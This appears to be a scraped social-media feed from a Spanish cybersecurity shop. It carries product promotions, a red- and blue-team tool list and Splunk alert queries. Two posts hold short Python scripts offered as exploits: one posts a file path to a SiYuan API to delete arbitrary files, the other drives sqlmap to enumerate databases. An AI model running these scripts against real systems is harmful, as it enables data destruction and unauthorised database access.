Formacion Informatica Gratis

25/05/2025

https://kalisupport.com/siem-ai-operator/

16/03/2025

¡Hola, comunidad de LinkedIn!

Estoy emocionado de presentarles KaliSupport, un chatbot desarrollado en Python diseñado para integrarse con Kali Linux. Este asistente virtual actúa como un compañero hacker, brindando soporte en comandos y herramientas de hacking para facilitar tus tareas de seguridad informática.

Pueden explorar el proyecto y contribuir en nuestro repositorio de GitHub:

https://github.com/murdok1982/kalisupport

¡Espero sus comentarios y sugerencias para mejorar esta herramienta!

recordar mantener el id agente pero cambiar el end point

chatbot para kalilinux escrito en python que te dara soporte en comandos y/o herramientas de hacking - murdok1982/kalisupport

16/03/2025

https://kalisupport.com/tienda/

Hemos visto que nos visitas desde Estados Unidos (EEUU). Hemos actualizado nuestros precios en Dólar de los Estados Unidos (US) para que comprar resulte más sencillo. Utiliza Euro en su lugar. Descartar

04/01/2025

Para la vulnerabilidad de eliminación arbitraria de archivos en SiYuan (CVE-2025-21609), podemos crear un script que analice y pruebe esta vulnerabilidad. Este script simula el envío de solicitudes POST a la API vulnerable.
import requests

def test_file_deletion(target_url, payload):
"""
Prueba la vulnerabilidad de eliminación arbitraria de archivos en el endpoint afectado.
"""
endpoint = f"{target_url}/api/history/getDocHistoryContent"
headers = {
"Content-Type": "application/json",
}

try:
print(f"Enviando payload al endpoint {endpoint}...")
response = requests.post(endpoint, json=payload, headers=headers)

# Verificar el estado de la respuesta
if response.status_code == 200:
print(f"Solicitud completada. Respuesta: {response.text}")
print("El servidor podría ser vulnerable. Revisa si el archivo objetivo fue eliminado.")
else:
print(f"Error en la solicitud. Código de estado: {response.status_code}")
print("El servidor podría no ser vulnerable o se rechazó la solicitud.")
except Exception as e:
print(f"Error al intentar conectar al servidor: {e}")

# Detalles de la vulnerabilidad
target_url = "http://example.com" # Cambia esto por la URL de tu servidor objetivo
payload = {
"path": "/path/to/target/file.txt" # Ruta del archivo que se intentará eliminar
}

# Ejecutar el análisis
test_file_deletion(target_url, payload)

Call now to connect with business.

04/01/2025

exploit para vulnerabilidad CVE-2025-0214
import os
import subprocess

def check_sql_injection(url, parameter):
"""
Automatiza el uso de SQLMap para verificar SQL Injection en un objetivo.
"""
try:
print(f"Verificando vulnerabilidad SQL Injection en {url}...")

# Construye el comando SQLMap
command = [
"sqlmap",
"-u", f"{url}?{parameter}=1", # URL y parámetro vulnerable
"--batch", # Automatiza el proceso (sin intervención del usuario)
"--dbs" # Enumera bases de datos si se encuentra vulnerable
]

# Ejecuta el comando y captura la salida
result = subprocess.run(command, capture_output=True, text=True)

# Muestra el resultado
print("=== Salida de SQLMap ===")
print(result.stdout)
print("========================")

if "vulnerable" in result.stdout.lower():
print(f"La URL {url} es vulnerable a SQL Injection.")
else:
print(f"No se detectaron vulnerabilidades en {url}.")
except Exception as e:
print(f"Ocurrió un error al ejecutar SQLMap: {e}")

# Detalles de la vulnerabilidad proporcionados en el JSON
url = "http://example.com/admin/index.php"
parameter = "headermenu_id"

# Llama a la función para verificar vulnerabilidad
check_sql_injection(url, parameter)

Call now to connect with business.

23/12/2024

https://kalisupport.com/producto/the-ultimate-laptop-for-hackers-and-cybersecurity-professionals/

MSI Raider GE78HX 13VI-201ES: The Ultimate Laptop for Hackers and Cybersecurity Professionals Unleash your full potential with the MSI Raider GE78HX 13VI-201ES, a powerhouse designed for the most demanding tasks in hacking, cybersecurity, and gaming. This 17-inch QHD+ laptop (2560×1600) with a stun...

14/12/2024

Hoy desde www.kalisupport.com presentamos alertas comunes para el siem Splunk
1. Viaje imposible
Un "viaje imposible" ocurre cuando un usuario inicia sesión desde ubicaciones geográficas distantes en un período de tiempo muy corto.

Consulta de búsqueda:
index=authentication sourcetype=auth_logs
| stats earliest(_time) as first_time, latest(_time) as last_time, values(ip) as ip_list, values(geo_location) as geo_list by user
| eval duration=last_time-first_time
| eval distance=if(geo_distance(values(geo_list)) > threshold_distance, "impossible", "possible")
| search distance="impossible"
Configuración de alerta:
Tipo de alerta: Programada
Frecuencia: Según tus requisitos (cada 5 minutos, cada hora, etc.)
Condición de activación: Si el número de eventos es mayor que 0
Acciones: Notificación por correo electrónico, o integración con sistemas de gestión de incidentes.
2. Ataque de fuerza bruta
Un ataque de fuerza bruta se caracteriza por múltiples intentos fallidos de inicio de sesión en un período corto de tiempo.

Consulta de búsqueda:
index=authentication sourcetype=auth_logs action=failure
| stats count by user, ip
| where count > 10
Configuración de alerta:
Tipo de alerta: Programada
Frecuencia: Según tus necesidades (ej., cada 5 minutos)
Condición de activación: Si el número de eventos es mayor que 0
Acciones:
Notificación, bloqueo de la IP a través de integración con firewall o SOAR.
3. Ejecutable detectado
Identificar cuando un archivo ejecutable (.exe, .dll, etc.) se detecta en un sistema no autorizado.

Consulta de búsqueda:
index=filesystem sourcetype=file_monitor file_extension IN ("exe", "dll", "bat")
| search NOT authorized_system="true"
Configuración de alerta:
Tipo de alerta: Basada en eventos
Frecuencia: En tiempo real
Condición de activación: Cuando se detecta un evento que coincide
Acciones: Notificación inmediata, ejecución de un guión para cuarentena.
4. TOR rojo detectado
Detectar acceso o actividad desde nodos de salida de la red TOR.

Consulta de búsqueda:
index=network sourcetype=firewall_logs
| search ip IN [ | inputlookup tor_exit_nodes.csv | fields ip ]
Configuración de alerta:
Tipo de alerta: Basada en eventos
Frecuencia: En tiempo real
Condición de activación: Cuando se detecta un evento que coincide
Acciones: Notificación inmediata, bloqueo de la IP con un script automatizado.
Configuración adicional:
Configuraciones comunes a todas las alertas:

Prioridad de alerta: Ajusta según el impacto (ej., crítica para viajes imposibles y fuerza bruta).
Notificaciones: Definir canales como correo electrónico, integración con SIEM/SOAR, o Slack.
Tiempos de retención: Asegúrese de almacenar los eventos relacionados para análisis forense.
Listas blancas y negras:

Usa listas blancas para eliminar direcciones IP o usuarios confiables.
Mantén actualizadas las listas negras para IPs o dominios conocidos como maliciosos.

10/12/2024

https://kalisupport.com/tienda/

We noticed you're visiting from Estados Unidos (EEUU). We've updated our prices to Dólar de los Estados Unidos (US) for your shopping convenience. Use Euro instead. Descartar

08/12/2024

🔐💻 Master the World of Technology with Us! 💻🔐

📢 Are you a cybersecurity enthusiast, an ethical hacker, or just someone who loves tech? We’ve got everything you need!
🛒 Exclusive Hacker Products: Gadgets, cybersecurity tools, specialized hardware, and so much more.
💼 Professional IT Services: Security audits, vulnerability protection, advanced technical support.

🚀 Don’t miss out on our exclusive deals!
👉 Shop now at: www.kalisupport.com/tienda

⚠️ NOTE: Our products and services are designed for legal and educational purposes. Ethics first! 🛡️

💡 Questions? Drop them in the comments or send us a DM!
💥 Join the tech revolution today. We’re waiting for you! 💥

Hack4r Kali Linux by Gustavo Lobato is a comprehensive solution designed to empower cybersecurity professionals and ethical hacking enthusiasts. Backed by the expertise and passion of Gustavo Lobato, a senior cybersecurity analyst with over 6 years of experience, we provide step-by-step guidance and...

06/12/2024

🔒 Diagrama de Herramientas de Red Team y Blue Team: Estrategias Ofensivas y Defensivas 🔍

Este diagrama presenta una visión integral de las herramientas clave utilizadas por los equipos de ciberseguridad ofensivos (Red Team) y defensivos (Blue Team) para simular ataques, detectar vulnerabilidades y proteger infraestructuras críticas. Es ideal para profesionales de ciberseguridad que buscan comprender cómo las técnicas de ataque y defensa interactúan en un entorno dinámico.

📌 Lo que incluye el diagrama:

Herramientas del Red Team (Ataque):

Reconocimiento: Nmap, Shodan, Maltego.
Explotación: Metasploit, Cobalt Strike, Empire.
Post-explotación: BloodHound, Mimikatz, PowerShell Empire.
Evasión: Veil Framework, Covenant, Obfuscation Tools.
Herramientas del Blue Team (Defensa):

Monitorización y Análisis: Splunk, ELK Stack, Wireshark.
Detección y Respuesta: EDR (CrowdStrike, Carbon Black), SIEM (QRadar, ArcSight).
Gestión de Vulnerabilidades: Nessus, OpenVAS, Qualys.
Defensa Activa: Suricata, Snort, Palo Alto Firewalls.
Conexiones Estratégicas:

Cómo las tácticas del Red Team se enfrentan a las contramedidas del Blue Team.
Flujos de ataque y defensa representados en un contexto realista.
🎯 ¿Para quién es este diagrama?

Profesionales de ciberseguridad que desean mejorar sus habilidades en simulaciones de ataques y estrategias de defensa.
Equipos SOC, Red Teams y Blue Teams que buscan mejorar la colaboración.
Estudiantes y entusiastas interesados en entender el ecosistema de herramientas ofensivas y defensivas.
💡 Cómo usar este diagrama:

Identifica herramientas clave para cada fase del ciclo de ataque y defensa.
Aprende cómo las tácticas del Red Team pueden ser mitigadas por el Blue Team.
Desarrolla estrategias combinadas (Purple Team) basadas en las herramientas destacadas.
👉 Descubre cómo estas herramientas trabajan juntas para fortalecer la postura de ciberseguridad en cualquier organización.